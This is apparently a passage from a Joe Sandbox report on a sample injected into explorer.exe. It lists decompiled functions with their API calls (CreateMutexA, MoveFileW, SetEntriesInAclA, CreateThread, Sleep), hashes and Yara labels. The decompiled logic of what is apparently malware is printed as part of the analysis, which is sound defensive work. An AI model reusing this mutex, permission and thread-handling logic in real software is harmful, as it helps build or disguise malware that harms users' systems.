Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0008590C, Relevance: 4.5, APIs: 3, Instructions: 44
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0x9e684; // 0x34f8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}

0x00085910
0x00085915
0x00085921
0x0008592e
0x00085932
0x0008594a
0x0008596a
0x0008596b
0x0008595a
0x0008595a
0x00085960
0x00085960
0x00085934
0x00085934
0x0008593a
0x0008593a
0x00085917
0x00085917
0x00085917
0x00085973

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1

Uniqueness

Uniqueness Score: -1.00%

Function 0008A471, Relevance: 4.5, APIs: 3, Instructions: 30
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A471(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E0008A4BF(_t17, _t16) < 0) {
						_t8 =  *0x9e684; // 0x34f8f0
						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}

0x0008a47d
0x0008a485
0x0008a489
0x0008a4a0
0x0008a4af
0x0008a4b5
0x0008a4b8
0x0008a4b8
0x00000000
0x0008a4ba
0x0008a48b
0x00000000

APIs

CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E14,00000000), ref: 0008A47F
GetLastError.KERNEL32 ref: 0008A48B
GetLastError.KERNEL32 ref: 0008A495

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateMutex
String ID:
API String ID: 200418032-0
Opcode ID: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
Instruction ID: e0de8723e9178c59a55691960d7167cf6849532d0ff7e7a54eb44961aa7457b0
Opcode Fuzzy Hash: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
Instruction Fuzzy Hash: 19F0E5323000209BFA2127A4D84CB5F3695FFDA7A0F025463F645CB621EAECCC0683B2

Uniqueness

Uniqueness Score: -1.00%

Function 00086DA0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00086DA0(void* __eflags, void* __fp0) {
				short _v536;
				WCHAR* _v544;
				WCHAR* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t22;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t34 =  *0x9e778; // 0x34fc18
				_t62 = (_t60 & 0xfffffff8) - 0x21c;
				_t51 = 0x31;
				_t32 = 1; // executed
				_t9 = E00089ED0(_t34, _t51); // executed
				if(_t9 != 0) {
					_t10 =  *0x9e78c; // 0x0
					_t66 = _t10;
					if(_t10 == 0) {
						_t49 =  *0x9e688; // 0xb0000
						_t10 = E0008EDCF(_t49 + 0xb0, _t51, _t66);
						 *0x9e78c = _t10;
					}
					_push(0);
					_push(_t10);
					_t11 =  *0x9e688; // 0xb0000
					_push(L"\\c");
					_t9 = E000892E5(_t11 + 0x438);
					_t59 = _t9;
					_t63 = _t62 + 0x10;
					_v544 = _t59;
					if(_t59 != 0) {
						while(1) {
							_t35 =  *0x9e688; // 0xb0000
							_t56 = E0008A471(_t35 + 0x1878, 0x1388);
							if(_t56 == 0) {
								break;
							}
							if(E0008B269(_t59) == 0) {
								_t32 = E0008F14F(_t59, 0x1388, _t74);
							}
							E0008A4DB(_t56);
							_t41 =  *0x9e684; // 0x34f8f0
							 *((intOrPtr*)(_t41 + 0x30))(_t56);
							if(_t32 > 0) {
								E0008980C( &_v544);
								_t43 =  *0x9e778; // 0x34fc18
								_t53 = 0x33;
								if(E00089ED0(_t43, _t53) != 0) {
									L12:
									__eflags = E00081C68(_t59, __eflags, _t74);
									if(__eflags >= 0) {
										E0008B1B1(_t59, _t53, __eflags, _t74);
										continue;
									}
								} else {
									_t46 =  *0x9e778; // 0x34fc18
									_t53 = 0x12;
									_t22 = E00089ED0(_t46, _t53);
									_t72 = _t22;
									if(_t22 != 0 || E0008A4EF(_t53, _t72) != 0) {
										_push(E0008980C(0));
										E00089640( &_v536, 0x104, L"%s.%u", _t59);
										_t63 = _t63 + 0x14;
										MoveFileW(_t59,  &_v536);
										continue;
									} else {
										goto L12;
									}
								}
							}
							break;
						}
						_t9 = E0008861A( &_v544, 0xfffffffe);
					}
				}
				return _t9;
			}

0x00086da0
0x00086da6
0x00086dac
0x00086db9
0x00086dba
0x00086dbb
0x00086dc2
0x00086dc8
0x00086dcd
0x00086dcf
0x00086dd1
0x00086ddd
0x00086de2
0x00086de2
0x00086de7
0x00086de9
0x00086dea
0x00086df4
0x00086dfa
0x00086dff
0x00086e01
0x00086e04
0x00086e0a
0x00086e10
0x00086e10
0x00086e26
0x00086e2a
0x00000000
0x00000000
0x00086e39
0x00086e42
0x00086e42
0x00086e46
0x00086e4b
0x00086e52
0x00086e57
0x00086e5d
0x00086e62
0x00086e6a
0x00086e72
0x00086ec0
0x00086ec7
0x00086ec9
0x00086ecd
0x00000000
0x00086ecd
0x00086e74
0x00086e74
0x00086e7c
0x00086e7d
0x00086e82
0x00086e84
0x00086e96
0x00086ea7
0x00086eac
0x00086eb5
0x00000000
0x00000000
0x00000000
0x00000000
0x00086e84
0x00086e72
0x00000000
0x00086e57
0x00086ede
0x00086ee4
0x00086e0a
0x00086eeb

APIs

MoveFileW.KERNEL32 ref: 00086EB5

Strings

%s.%u, xrefs: 00086E98

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: FileMove
String ID: %s.%u
API String ID: 3562171763-1288070821
Opcode ID: 421a485327c9563d6243980d6a9faad7c7a1b283adcb3d3b1c47cb7f55d407e9
Instruction ID: a5438fa8a69558a9aa6e28972bce87c3de03cd7a9a26965d290b63cd5faf2151
Opcode Fuzzy Hash: 421a485327c9563d6243980d6a9faad7c7a1b283adcb3d3b1c47cb7f55d407e9
Instruction Fuzzy Hash: FE31EF753043105AFA54FB74DC86ABE3399FB90750F14002AFA828B283EF26CD01C752

Uniqueness

Uniqueness Score: -1.00%

Function 00082AEA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00082AEA() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0x9e710 * 0x64;
				_t39 = 0;
				_v12 =  *0x9e710 * 0x64;
				_t16 = E00088604(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0x9e710; // 0x2
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E00089F48(0xe); // executed
						E0008861A( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0x9e714; // 0x34fe88
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0x9e714; // 0x34fe88
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
							_t26 = E00089601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0x9e710; // 0x2
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}

0x00082af0
0x00082afa
0x00082afd
0x00082b00
0x00082b05
0x00082b07
0x00082b0d
0x00082b17
0x00082b1d
0x00082b1f
0x00082b24
0x00082b81
0x00082b87
0x00082b8b
0x00082b96
0x00000000
0x00082b9d
0x00082b26
0x00082b28
0x00082b28
0x00082b31
0x00082b35
0x00082b3d
0x00082b43
0x00082b43
0x00082b44
0x00082b49
0x00082b4d
0x00082b63
0x00082b68
0x00082b6e
0x00082b71
0x00082b74
0x00082b74
0x00082b76
0x00082b77
0x00082b7a
0x00082b7d
0x00000000
0x00082b28
0x00000000

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

lstrcatA.KERNEL32(00000000,0009B9A0,0008573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,0008573E), ref: 00082B3D

Strings

%u;%u;%u, xrefs: 00082B59

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeaplstrcat
String ID: %u;%u;%u
API String ID: 3011335133-2973439046
Opcode ID: 42a2cadbc932a715926ff7222a2c2e5f4bd2b5e85362bffd8c295efa13a93fe6
Instruction ID: 5a0a3936677ef0304e341d4e43594f78b37864cc0fc2619589e6b45d54e6a73c
Opcode Fuzzy Hash: 42a2cadbc932a715926ff7222a2c2e5f4bd2b5e85362bffd8c295efa13a93fe6
Instruction Fuzzy Hash: 7111E132A05300EBDB14EFE9EC85DAABBA9FB84324B10442AE50097191DB349900CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0008BD10, Relevance: 3.1, APIs: 2, Instructions: 149
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0008BD10() {
				char _v8;
				void* _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t90;
				void* _t92;
				intOrPtr _t93;
				void* _t98;

				_t90 = 8;
				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				memset( &_v96, 0, _t90 << 2);
				_v20 = 0x100;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = 0;
				_push(0);
				_v8 = 0;
				_push(1);
				_v12 = 0;
				_push( &_v24);
				_t58 =  *0x9e68c; // 0x34fab8
				_t98 = 0;
				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t67 =  *0x9e68c; // 0x34fab8
						 *((intOrPtr*)(_t67 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t65 =  *0x9e68c; // 0x34fab8
						 *((intOrPtr*)(_t65 + 0x10))(_v12);
					}
					if(_t98 != 0) {
						_t63 =  *0x9e684; // 0x34f8f0
						 *((intOrPtr*)(_t63 + 0x34))(_t98);
					}
					if(_v16 != 0) {
						_t61 =  *0x9e684; // 0x34f8f0
						 *((intOrPtr*)(_t61 + 0x34))(_v16);
					}
					L22:
					return _t98;
				}
				_v68 = _v12;
				_t70 =  *0x9e688; // 0xb0000
				_t92 = 2;
				_v96 = 0x1fffff;
				_v92 = 0;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t92);
					_push(_t92);
					_push( &_v32);
					_t85 =  *0x9e68c; // 0x34fab8
					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
						goto L14;
					} else {
						_t87 = _v8;
						if(_t87 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t87;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t73 =  *0x9e68c; // 0x34fab8
						_push(1); // executed
						if( *((intOrPtr*)(_t73 + 8))() != 0) {
							goto L14;
						}
						_t98 = LocalAlloc(0x40, 0x14);
						if(_t98 == 0) {
							goto L14;
						}
						_t93 =  *0x9e68c; // 0x34fab8
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
							goto L14;
						}
						_t77 =  *0x9e68c; // 0x34fab8
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t81 =  *0x9e68c; // 0x34fab8
							 *((intOrPtr*)(_t81 + 0x10))(_v8);
						}
						_t79 =  *0x9e68c; // 0x34fab8
						 *((intOrPtr*)(_t79 + 0x10))(_v12);
						goto L22;
					}
				}
			}

0x0008bd1b
0x0008bd1e
0x0008bd26
0x0008bd2c
0x0008bd2f
0x0008bd34
0x0008bd3a
0x0008bd3b
0x0008bd3c
0x0008bd3d
0x0008bd3e
0x0008bd3f
0x0008bd40
0x0008bd41
0x0008bd44
0x0008bd47
0x0008bd49
0x0008bd4c
0x0008bd50
0x0008bd53
0x0008bd54
0x0008bd59
0x0008bd60
0x0008be54
0x0008be58
0x0008be5a
0x0008be62
0x0008be62
0x0008be69
0x0008be6b
0x0008be73
0x0008be73
0x0008be78
0x0008be7a
0x0008be80
0x0008be80
0x0008be87
0x0008be89
0x0008be91
0x0008be91
0x0008be95
0x0008be9a
0x0008be9a
0x0008bd6b
0x0008bd6e
0x0008bd75
0x0008bd76
0x0008bd7d
0x0008bd80
0x0008bd87
0x0008bd8a
0x0008bd95
0x0008bda0
0x00000000
0x00000000
0x00000000
0x0008bda2
0x0008bda2
0x0008bda5
0x0008bda6
0x0008bda7
0x0008bda8
0x0008bda9
0x0008bdaa
0x0008bdab
0x0008bdac
0x0008bdae
0x0008bdaf
0x0008bdb3
0x0008bdb4
0x0008bdbe
0x00000000
0x0008bdc4
0x0008bdc4
0x0008bdc9
0x0008bdcb
0x0008bdcd
0x0008bdce
0x0008bdd5
0x0008bdd8
0x0008bddf
0x0008bde2
0x0008bde5
0x0008bde5
0x0008bde8
0x0008bdeb
0x0008bdec
0x0008bdf0
0x0008bdf1
0x0008bdf6
0x0008bdfc
0x00000000
0x00000000
0x0008be08
0x0008be0c
0x00000000
0x00000000
0x0008be0e
0x0008be14
0x0008be16
0x0008be1f
0x00000000
0x00000000
0x0008be21
0x0008be26
0x0008be27
0x0008be2a
0x0008be2c
0x0008be35
0x00000000
0x00000000
0x0008be3a
0x0008be3c
0x0008be44
0x0008be44
0x0008be47
0x0008be4f
0x00000000
0x0008be4f
0x0008bdbe

APIs

SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BDF7
LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE02

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocEntriesLocal
String ID:
API String ID: 2146116654-0
Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
Instruction ID: 3aa66279fdb8b3e8acfe9a35cde7f6eb8d9a09b5f03ef1515584b77c0f26ffcf
Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
Instruction Fuzzy Hash: C3512A71A00248EFEB64DF99D888ADEBBF8FF44704F15806AF604AB260D7749D45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000898EE, Relevance: 3.1, APIs: 2, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E000898EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				struct _SECURITY_ATTRIBUTES* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t98;
				int _t106;
				intOrPtr _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t77 =  *0x9e76c; // 0x1d0
				_t73 = 0;
				if(E0008A4BF(_t77, 0x7530) >= 0) {
					_t45 =  *0x9e770; // 0x330c20
					_t112 = 0;
					_t106 = 0;
					do {
						_t78 =  *((intOrPtr*)(_t106 + _t45));
						if(_t78 == 0) {
							L6:
							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
								_t113 = _t112 << 5;
								if(_v8 == _t73) {
									 *(_t113 + _t45 + 0x10) = _t73;
									_t46 =  *0x9e770; // 0x330c20
									 *(_t113 + _t46 + 0xc) = _t73;
									L14:
									_t79 =  *0x9e770; // 0x330c20
									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
									_t48 =  *0x9e770; // 0x330c20
									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
									_t49 = E0008A471(0, 1);
									_t82 =  *0x9e770; // 0x330c20
									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
									_t83 =  *0x9e770; // 0x330c20
									_t30 = _t83 + _t113 + 4; // 0x330c24
									_t52 = CreateThread(_t73, _t73, E000898A6, _t83 + _t113, _t73, _t30);
									_t53 =  *0x9e770; // 0x330c20
									 *(_t113 + _t53) = _t52;
									_t54 =  *0x9e770; // 0x330c20
									_t86 =  *(_t113 + _t54);
									if(_t86 != 0) {
										SetThreadPriority(_t86, 0xffffffff);
										_t87 =  *0x9e770; // 0x330c20
										 *0x9e774 =  *0x9e774 + 1;
										E0008A4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
										_t74 =  *0x9e770; // 0x330c20
										_t73 = _t74 + _t113;
									} else {
										_t59 =  *0x9e684; // 0x34f8f0
										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
										_t61 =  *0x9e770; // 0x330c20
										_t37 = _t61 + 0xc; // 0x330c2c
										_t91 = _t37 + _t113;
										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
											E0008861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
											_t61 =  *0x9e770; // 0x330c20
										}
										_t92 = 8;
										memset(_t113 + _t61, 0, _t92 << 2);
									}
									L19:
									_t89 =  *0x9e76c; // 0x1d0
									E0008A4DB(_t89);
									_t58 = _t73;
									L20:
									return _t58;
								}
								_t110 = _a4;
								_t65 = E00088604(_t110);
								_t97 =  *0x9e770; // 0x330c20
								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
								_t66 =  *0x9e770; // 0x330c20
								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
									goto L19;
								}
								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
								_t67 =  *0x9e770; // 0x330c20
								E000886E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
								_t115 = _t115 + 0xc;
								goto L14;
							}
							goto L7;
						}
						_t69 =  *0x9e684; // 0x34f8f0
						_push(_t73);
						_push(_t78);
						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
							_t45 =  *0x9e770; // 0x330c20
							goto L7;
						}
						_t98 =  *0x9e770; // 0x330c20
						E0008984A(_t106 + _t98, 0);
						_t45 =  *0x9e770; // 0x330c20
						goto L6;
						L7:
						_t106 = _t106 + 0x20;
						_t112 = _t112 + 1;
					} while (_t106 < 0x1000);
					goto L19;
				}
				_t58 = 0;
				goto L20;
			}

0x000898f1
0x000898f2
0x000898f3
0x000898fb
0x000898fe
0x00089905
0x0008990e
0x00089917
0x0008991e
0x00089920
0x00089922
0x00089922
0x00089927
0x0008994f
0x00089952
0x0008996c
0x00089972
0x000899b2
0x000899b6
0x000899bb
0x000899bf
0x000899bf
0x000899cb
0x000899cf
0x000899d7
0x000899dd
0x000899e2
0x000899e8
0x000899ec
0x000899f4
0x00089a06
0x00089a0b
0x00089a10
0x00089a13
0x00089a18
0x00089a1d
0x00089a59
0x00089a5f
0x00089a65
0x00089a6f
0x00089a74
0x00089a7a
0x00089a1f
0x00089a23
0x00089a28
0x00089a2b
0x00089a30
0x00089a33
0x00089a37
0x00089a3e
0x00089a43
0x00089a49
0x00089a51
0x00089a52
0x00089a52
0x00089a7c
0x00089a7c
0x00089a82
0x00089a88
0x00089a8b
0x00089a8d
0x00089a8d
0x00089974
0x00089978
0x0008997e
0x00089984
0x00089988
0x00089991
0x00000000
0x00000000
0x00089997
0x0008999b
0x000899a8
0x000899ad
0x00000000
0x000899ad
0x00000000
0x00089952
0x00089929
0x0008992e
0x0008992f
0x00089938
0x00089965
0x00000000
0x00089965
0x0008993a
0x00089945
0x0008994a
0x00000000
0x00089954
0x00089954
0x00089957
0x00089958
0x00000000
0x00089960
0x00089910
0x00000000

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cadc4244450b856390e4109349fe98e1b04985f9c6077f91c07d36e44fa3e3d
Instruction ID: 2208b45a903d8e4e3ebf4af7583ef236fbc94e4c18dfd99628fde9c82a46c99b
Opcode Fuzzy Hash: 0cadc4244450b856390e4109349fe98e1b04985f9c6077f91c07d36e44fa3e3d
Instruction Fuzzy Hash: 4F515171614640DFEB69EFA8DC84876F7F9FB48314358892EE48687361D735AC02CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00085631, Relevance: 3.1, APIs: 2, Instructions: 97
sleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00085631(void* __edx, void* __edi) {
				char _v44;
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				void* _t49;
				void* _t54;

				_t54 = __edi;
				_t8 = E00089E66(0x3b); // executed
				if(_t8 != 0xffffffff) {
					L2:
					E0008980C(0x9e6c8);
					_t39 = 0x37; // executed
					E00089F06(_t39);
					_t11 =  *0x9e688; // 0xb0000
					_t40 = 0x3a; // executed
					E00089F06(_t40); // executed
					E0008E4C1(_t63);
					_t14 =  *0x9e688; // 0xb0000
					_t41 =  &_v44;
					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
					E0008A86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
					_t17 =  *0x9e684; // 0x34f8f0
					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
					 *0x9e74c = _t18;
					if(_t18 != 0) {
						_t20 = CreateMutexA(0, 0, 0);
						 *0x9e76c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							_t34 = E00088604(0x1000); // executed
							_t52 = 0;
							 *0x9e770 = _t34;
							_t49 =  *0x9e774; // 0x2
							__eflags = _t34;
							_t41 =  !=  ? 0 : _t49;
							__eflags = _t41;
							 *0x9e774 = _t41; // executed
						}
						E0008153B(_t41, _t52); // executed
						E000898EE(E00082EDA, 0, __eflags, 0, 0); // executed
						E00083017(); // executed
						E000831C2(0, __eflags); // executed
						E000829B1(); // executed
						E00083BB2(_t54, __eflags); // executed
						while(1) {
							__eflags =  *0x9e758; // 0x0
							if(__eflags != 0) {
								break;
							}
							E0008980C(0x9e750);
							_push(0x9e750);
							_push(0x9e750); // executed
							E0008279B();
							Sleep(0xfa0);
						}
						E00083D34();
						E00089A8E();
						E000834CB();
						_t33 = 0;
						__eflags = 0;
					} else {
						goto L3;
					}
				} else {
					_t36 = E00082DCB();
					_t63 = _t36;
					if(_t36 != 0) {
						L3:
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

0x00085631
0x0008563d
0x00085646
0x00085651
0x00085656
0x00085669
0x0008566a
0x0008566f
0x0008567f
0x00085680
0x00085688
0x0008568d
0x00085692
0x0008569c
0x0008569f
0x000856a9
0x000856b1
0x000856b7
0x000856be
0x000856d0
0x000856d6
0x000856db
0x000856dd
0x000856e4
0x000856e9
0x000856eb
0x000856f1
0x000856f7
0x000856f9
0x000856f9
0x000856fc
0x000856fc
0x00085702
0x00085710
0x00085717
0x0008571c
0x00085721
0x00085726
0x00085750
0x00085750
0x00085756
0x00000000
0x00000000
0x00085732
0x00085737
0x00085738
0x00085739
0x0008574a
0x0008574a
0x00085758
0x0008575d
0x00085762
0x00085767
0x00085767
0x00000000
0x00000000
0x00000000
0x00085648
0x00085648
0x0008564d
0x0008564f
0x000856c0
0x000856c2
0x00000000
0x00000000
0x00000000
0x0008564f
0x0008576d

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856D0

Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839

Sleep.KERNELBASE(00000FA0), ref: 0008574A

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 3249252070-0
Opcode ID: fd4bb5a668434b88d5c04a99dfde256102c0f641a73eee2e9a85173188a96518
Instruction ID: 618d9e32d6944c2961c1c58ef027407fe41e2fb87ac27e57644674ab890b217f
Opcode Fuzzy Hash: fd4bb5a668434b88d5c04a99dfde256102c0f641a73eee2e9a85173188a96518
Instruction Fuzzy Hash: 0031D6312056509BF724FBB5EC069EA3B99FF557A0B144126F5C9861A3EE349900C763

Uniqueness

Uniqueness Score: -1.00%

Function 0008A6A9, Relevance: 3.1, APIs: 2, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 26%

